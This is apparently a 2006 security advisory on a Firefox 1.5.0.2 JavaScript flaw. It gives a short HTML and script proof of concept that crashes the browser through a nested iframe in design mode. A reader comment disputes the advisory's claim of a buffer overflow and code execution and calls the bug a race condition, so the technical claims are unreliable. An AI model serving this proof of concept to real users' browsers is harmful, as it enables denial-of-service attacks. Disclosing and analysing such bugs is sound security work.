|
|
| |
| Improper handling of Javascript content allows attackers to execute arbitrary code and crash Mozilla Firefox. |
| |
Credit:
The information has been provided by Chris.
The original article can be found at: http://www.securident.com/vuln/ff.txt
|
| |
Vulnerable Systems:
* Firefox 1.5.0.2
By using the Javascript bellow, Firefox will have a buffer overflow when it will attempt to use the new iframe that was written.
A focus on the iframe will cause Firefox to crash.
Proof of Concept:
< textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea>
< script>
var textarea = document.getElementsByName("x_OtherInfo");
textarea=textarea.item(0);
var htmlarea = document.createElement("div");
htmlarea.className = "htmlarea";
textarea.parentNode.insertBefore(htmlarea, textarea);
var iframe = document.createElement("iframe");
htmlarea.appendChild(iframe);
var doc = iframe.contentWindow.document;
doc.designMode = "on";
doc.open();
doc.write("<iframe src=''>");
iframe.contentWindow.focus()
doc.close();
< / script>
< / textarea>
|
| Subject:
|
remote code execution wtf |
Date: |
2 May 2006 |
| From: |
zarz |
do people even analyze any of these bugs?
i fail to see how this is a buffer overflow of any kind. it looks more like a race condition to me, and
it triggers like a race condition as well. and the focus on the iframe doesn't cause the crash, that
initially triggers the bug. the doc.close() triggers the crash. some people need to figure out how
to learn to use their debugger.
-zargh |
|
|
|
|
